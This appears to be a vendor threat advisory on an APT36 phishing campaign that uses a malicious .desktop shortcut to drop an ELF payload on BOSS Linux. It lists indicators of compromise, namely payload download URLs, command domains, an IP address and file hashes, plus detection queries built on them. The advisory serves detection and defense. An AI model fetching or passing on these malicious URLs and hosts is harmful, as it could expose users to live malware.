Phishing Attack: Deploying Malware on Indian Defense BOSS Linux

    Monday, July 7, 2025 In: Threat Research Print

    Date: 07/07/2025

    Severity: Critical

    Summary

    Our team uncovered a cyber-espionage campaign by APT36 (Transparent Tribe), targeting Indian defense personnel. In a tactical shift, the group now focuses on Linux systems, especially BOSS Linux used by Indian government agencies. Phishing emails deliver a ZIP file containing a malicious .desktop shortcut that executes on user interaction. It opens a decoy PowerPoint file while silently downloading and running a malicious ELF payload to compromise the system.

    Indicators of Compromise (IOC) List

    Domains\URLs:

    https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx

    https://govin.sorlastore.com/uploads/BOSS.elf

    sorlastore.com

    modgovin.onthewifi.com

    IP Address : 

    101.99.92.182

    Hash : 

    608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a

    ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab

    e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064

    167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f

    Gurucul Threat Detection and Incident Response (TDIR) Queries for Detection

    Domains\URLs:

    domainname like "https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx" or url like "https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx" or siteurl like "https://govin.sorlastore.com/uploads/Cyber-Security-Advisory.pptx" or domainname like "https://govin.sorlastore.com/uploads/BOSS.elf" or url like "https://govin.sorlastore.com/uploads/BOSS.elf" or siteurl like "https://govin.sorlastore.com/uploads/BOSS.elf" or domainname like "modgovin.onthewifi.com" or url like "modgovin.onthewifi.com" or siteurl like "modgovin.onthewifi.com" or domainname like "sorlastore.com" or url like "sorlastore.com" or siteurl like "sorlastore.com"

    IP Address : 

    dstipaddress IN ("101.99.92.182") or srcipaddress IN ("101.99.92.182")

    Hash : 

    sha256hash IN ("608fff2cd4b727799be762b95d497059a202991eb3401a55438071421b9b5e7a","e528799a29e9048c1e71b78223311cad2699d035a731d1a6664fc8ddd0642064","ace379265be7f848d512b27d6ca95e43cef46a81dc15d1ad92ec6f494eed42ab","167b387005d6d2a55ad282273c58d1786a2ee0fa3e7e0cb361d4d61d8618ee5f")

    Reference:

    https://www.cyfirma.com/research/phishing-attack-deploying-malware-on-indian-defense-boss-linux/


    Tags

    MalwarePhishingAPT36Transparent TribeIndiaDefense Industrial BaseGovernment Services and Facilities

    « Previous ArticleNext Article »

    Comments

    No records to display

    Looking for Something?
    Threat Research Categories:
    Tags

    Privacy & Security StatementTerms & Conditions
    Copyright © 2025 by Gurucul - All rights reserved.